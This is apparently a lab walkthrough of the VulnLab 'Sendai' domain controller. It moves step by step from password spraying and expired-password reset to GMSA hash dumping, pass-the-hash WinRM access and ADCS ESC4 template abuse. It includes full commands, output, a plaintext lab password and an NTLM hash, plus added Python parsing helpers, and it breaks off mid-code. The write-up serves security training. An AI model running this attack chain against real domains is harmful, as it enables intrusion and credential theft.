vulnlab sendai
a medium windows machine
enum
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares
SMB  dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\puck:
SMB  dc.sendai.vl  445  DC  [+] Enumerated shares
SMB  dc.sendai.vl  445  DC  Share       Permissions  Remark
SMB  dc.sendai.vl  445  DC  -----       -----------  ------
SMB  dc.sendai.vl  445  DC  ADMIN$                   Remote Admin
SMB  dc.sendai.vl  445  DC  C$                       Default share
SMB  dc.sendai.vl  445  DC  config
SMB  dc.sendai.vl  445  DC  IPC$        READ         Remote IPC
SMB  dc.sendai.vl  445  DC  NETLOGON                 Logon server share
SMB  dc.sendai.vl  445  DC  sendai      READ         company share
SMB  dc.sendai.vl  445  DC  SYSVOL                   Logon server share
SMB  dc.sendai.vl  445  DC  Users       READ
SMB  dc.sendai.vl  445  DC  [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB  dc.sendai.vl  445  DC  [*] Trying with SAMRPC protocol
rid-brute
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB  dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\puck:
SMB  dc.sendai.vl  445  DC  [+] Brute forcing RIDs
SMB  dc.sendai.vl  445  DC  498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  500: SENDAI\Administrator (SidTypeUser)
SMB  dc.sendai.vl  445  DC  501: SENDAI\Guest (SidTypeUser)
SMB  dc.sendai.vl  445  DC  502: SENDAI\krbtgt (SidTypeUser)
SMB  dc.sendai.vl  445  DC  512: SENDAI\Domain Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  513: SENDAI\Domain Users (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  514: SENDAI\Domain Guests (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  515: SENDAI\Domain Computers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  516: SENDAI\Domain Controllers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  517: SENDAI\Cert Publishers (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  518: SENDAI\Schema Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  525: SENDAI\Protected Users (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  526: SENDAI\Key Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  1000: SENDAI\DC$ (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB  dc.sendai.vl  445  DC  1104: SENDAI\sqlsvc (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1105: SENDAI\websvc (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1107: SENDAI\staff (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1112: SENDAI\Susan.Harper (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1117: SENDAI\Jason.Brady (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1128: SENDAI\ca-operators (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1129: SENDAI\admsvc (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1131: SENDAI\support (SidTypeGroup)

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
Check for password must change
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB  dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Guest:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Domain:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Domain:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Domain:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Domain:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Domain:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Cert:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Schema:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Enterprise:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Group:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Read-only:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Cloneable:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Protected:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Key:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Enterprise:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\RAS:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Allowed:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\Denied:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\DC$: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\DnsAdmins:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\DnsUpdateProxy:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\SQLServer2005SQLBrowserUser$DC:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\websvc: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\staff:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\ca-operators:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\admsvc:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\support:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\:
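The rid-brute listing and the spray result above can be parsed rather than read by eye. The Python below is an added example (not part of the original writeup): it pulls sAMAccountNames out of the rid-brute output without truncating multi-word group names, groups the spray lines by NT status, and cross-checks the STATUS_PASSWORD_MUST_CHANGE hits against real user principals; the sample lines are constructed from a few of the entries above.

```python
import re
from collections import defaultdict

# Constructed sample lines in the format crackmapexec printed on this page
# (a handful of the real entries, not the full output).
RID_SAMPLE = """\
SMB  dc.sendai.vl  445  DC  512: SENDAI\\Domain Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1104: SENDAI\\sqlsvc (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1118: SENDAI\\Elliot.Yates (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1127: SENDAI\\Thomas.Powell (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1130: SENDAI\\mgtsvc$ (SidTypeUser)
"""

SPRAY_SAMPLE = """\
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Administrator: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\\Domain:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\mgtsvc$: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\\:
"""

# "1118: SENDAI\Elliot.Yates (SidTypeUser)" -> rid, name, sid type
RID_RE = re.compile(r"(\d+):\s+[^\\]+\\(.+?)\s+\((SidType\w+)\)")
# "[-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE" -> flag, user, status
SPRAY_RE = re.compile(r"\[([+-])\]\s+[^\\]+\\([^:]*):\s*(\S*)")


def parse_rid_brute(text, sid_types=("SidTypeUser",)):
    """Return the sAMAccountNames of the requested SID types.

    Names are taken whole, so "Domain Admins" stays one entry; the page's
    `cut -d '\\' -f2 | awk '{print $1}'` cuts it to "Domain", which is why the
    spray later reports non-existent principals such as sendai.vl\\Domain.
    """
    names = []
    for line in text.splitlines():
        m = RID_RE.search(line)
        if m and m.group(3) in sid_types:
            names.append(m.group(2))
    return names


def parse_spray(text):
    """Group spray results by NT status; a [+] line is recorded as "OK"."""
    by_status = defaultdict(list)
    for line in text.splitlines():
        m = SPRAY_RE.search(line)
        if not m or not m.group(2):          # skip the empty-name lines
            continue
        flag, user, status = m.groups()
        by_status["OK" if flag == "+" else status or "UNKNOWN"].append(user)
    return dict(by_status)


def must_change_accounts(spray_text, rid_text):
    """Real user accounts whose password has expired and must be changed.

    Cross-checking against the RID output drops truncated group names and
    other artifacts so only genuine user principals are reported.
    """
    users = set(parse_rid_brute(rid_text))
    flagged = parse_spray(spray_text).get("STATUS_PASSWORD_MUST_CHANGE", [])
    return sorted(u for u in flagged if u in users)


if __name__ == "__main__":
    for status, users in parse_spray(SPRAY_SAMPLE).items():
        print(f"{status:28} {', '.join(users)}")
    print("must change:", must_change_accounts(SPRAY_SAMPLE, RID_SAMPLE))
```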
change smb pass
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
Enumerating some more
┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---

┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;

---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S
Do the bloodhound thing
We have GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSA password (ReadGMSAPassword) of mgtsvc$.
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB   dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP  dc.sendai.vl  636  DC  [+] sendai.vl\Elliot.Yates:Passw0rd@
LDAP  dc.sendai.vl  636  DC  [*] Getting GMSA Passwords
LDAP  dc.sendai.vl  636  DC  Account: mgtsvc$  NTLM: 57<REDACTED>11

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11
SMB    dc.sendai.vl  5985  DC  [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP   dc.sendai.vl  5985  DC  [*] http://dc.sendai.vl:5985/wsman
WINRM  dc.sendai.vl  5985  DC  [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)
Evil-WinRM to the box & PrivescCheck.ps1
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1

Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1

Data: 394496 bytes of 394496 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp>
*Evil-WinRM* PS C:\temp> . .\PrivescCheck.ps1; Invoke-PrivescCheck

+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).

Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+
ADCS Enum with Certipy-ad
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB   dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP  dc.sendai.vl  389  DC  [+] sendai.vl\Elliot.Yates:Passw0rd@
ADCS                           Found PKI Enrollment Server: dc.sendai.vl
ADCS                           Found CN: sendai-DC-CA
ADCS                           Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
findings
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",
Abuse the template
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
Run certipy-ad again
Running certipy-ad find again, we now find:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"
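Put the two Certipy outputs side by side and the chain is clear: a single write ACE on the template object (the ESC4 for ca-operators in the first run) is what made ESC1, ESC2 and ESC3 appear in the second. The Python below is an added example, not Certipy's code: it encodes those four checks over a Certipy-shaped template dict so a defender auditing a template export can see the same transition. The field names are assumed to follow Certipy's JSON output, and both sample templates are constructed from the findings above.

```python
# Field names follow Certipy's JSON output as an assumption; the two template
# dicts below are constructed from the before/after findings on this page.
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
ADMIN = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}
CLIENT_AUTH = {"Client Authentication", "PKINIT Client Authentication",
               "Smart Card Logon", "Any Purpose"}
WRITE_KEYS = ("Write Owner Principals", "Write Dacl Principals",
              "Write Property Principals")


def short(principal):
    """'SENDAI.VL\\ca-operators' -> 'ca-operators'."""
    return principal.split("\\")[-1]


def classify(t):
    """Return {"ESCn": reason} for one template dict."""
    findings = {}
    perms = t["Permissions"]
    ekus = set(t["Extended Key Usage"])
    # ESC1-3 need a low-privilege principal that can enroll with no manager
    # approval and no extra signature on an enabled template.
    enrollers = [p for p in perms["Enrollment Permissions"]["Enrollment Rights"]
                 if short(p) in LOW_PRIV]
    ungated = (t["Enabled"] and not t["Requires Manager Approval"]
               and t["Authorized Signatures Required"] == 0)
    if ungated and enrollers:
        who = "'%s' can enroll" % enrollers[0]
        if t["Enrollee Supplies Subject"] and (not ekus or ekus & CLIENT_AUTH):
            findings["ESC1"] = (who + ", enrollee supplies subject and "
                                "template allows client authentication")
        if not ekus or "Any Purpose" in ekus:
            findings["ESC2"] = who + " and template can be used for any purpose"
        if "Certificate Request Agent" in ekus:
            findings["ESC3"] = (who + " and template has Certificate Request "
                                "Agent EKU set")
    # ESC4: a non-admin principal owns or can rewrite the template object,
    # which is what let ca-operators turn this template into ESC1/2/3.
    ctrl = perms["Object Control Permissions"]
    writers = [ctrl.get("Owner")] + [p for k in WRITE_KEYS for p in ctrl.get(k, [])]
    writers = [p for p in writers if p and short(p) not in ADMIN]
    if writers:
        findings["ESC4"] = "'%s' has dangerous permissions" % writers[0]
    return findings


def template(name, supplies_subject, ekus, enrollers, writers):
    """Build a Certipy-shaped template dict (constructed test data)."""
    return {
        "Template Name": name,
        "Enabled": True,
        "Enrollee Supplies Subject": supplies_subject,
        "Extended Key Usage": ekus,
        "Requires Manager Approval": False,
        "Authorized Signatures Required": 0,
        "Permissions": {
            "Enrollment Permissions": {"Enrollment Rights": enrollers},
            "Object Control Permissions": {
                "Owner": "SENDAI.VL\\Administrator",
                "Write Owner Principals": writers,
                "Write Dacl Principals": writers,
                "Write Property Principals": writers,
            },
        },
    }


# SendaiComputer as the first certipy-ad find reported it: only ESC4.
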